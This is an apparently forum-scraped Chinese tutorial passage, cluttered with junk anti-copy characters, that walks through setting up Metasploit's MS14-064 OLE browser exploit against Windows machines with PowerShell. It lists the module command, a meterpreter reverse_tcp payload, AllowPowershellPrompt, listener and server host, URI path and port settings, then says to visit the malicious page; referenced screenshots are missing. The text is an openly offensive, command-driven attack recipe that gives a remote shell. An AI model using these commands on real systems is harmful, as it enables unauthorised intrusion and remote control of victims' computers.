4 n: K5 X& C" t+ E; S4 u 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示
' P/ _9 A' j: J3 I# }
! A6 \; u; `5 G. C9 k. A B
# O7 y; R# \: a& I* ?) x' S 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: # h3 K/ R% y* T9 |3 N1 w( D" n
' I# I4 [4 C6 h4 `) o) @8 m
4 ?4 j. W/ d2 _9 k/ W5 r 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp
% D4 e- t/ L: J' b
U: q% @& b" s8 z5 J
# b% } K9 l/ L6 n set AllowPowershellPrompt true6 x7 e0 m5 d! t/ |' w5 E9 j
% p) k8 F1 T$ B. k! f) R2 I1 F
. \+ ^" `! ^ O v l0 b6 _
Set LHOST 192.168.0.109
& S% _$ J/ b* G3 q) s
% Z; |; P/ i+ h* m2 _, r) _' T( ~( @: x8 b! z6 g; o4 U; J
set SRVHOST 192.168.0.109
% J! _. w$ g; [" c/ y
! {8 [ e& k' P6 i+ v6 S {+ l$ k1 u) f2 X
Set uripath share
- d6 S2 J' ?7 Y7 T$ p Y; W
2 ~2 d# {! X( z) B4 n7 x
! V$ p) l3 Q$ o, e Set srvport 80
( ]0 z( B& j9 w' ~6 V2 R6 K
( B+ C1 V+ S0 A: \' c
: i4 _+ u) ]5 w7 j 9 x, G2 U' ?! q
) G+ l% ~* }0 ?) A9 u" E- p& J/ C2 ~5 Q/ }5 ~. s
2 o$ |' Y6 W! \# S; h/ Z
, L6 O" I* b3 I
! R' b6 \8 T l; ]
% i. Z1 X3 J4 j7 |9 ^
. Y4 n& s, S6 J1 ~
; _2 _% e. N# N
; x- m1 K. o0 O$ J# B, w- I/ k: O
- e. w+ Y4 x- a# m
! r5 H6 o5 S* }# x5 ^4 ~# z0 O
4 I, g k) J; z. O8 d7 Q
2 ], {5 H4 l! N
& F0 {+ q8 C# {6 k$ W
下面我们来访问本地地址如图:
& m) l7 P* L" X& N" |0 S: U
" m: f9 W4 b& [8 M2 T# u' \2 p) e/ c$ \
. c$ A8 S- `0 W8 m
* s4 q2 h4 i6 ^3 j' e4 e" ^) F
" e( z2 j0 G$ ^ q" \
4 {& L7 B& a4 @- a" r$ n" u
: J" w; x* E/ N& ?; ]
4 n O- L) K, ^1 G: C, g3 R0 `
6 u" G* Y3 t4 n+ A$ I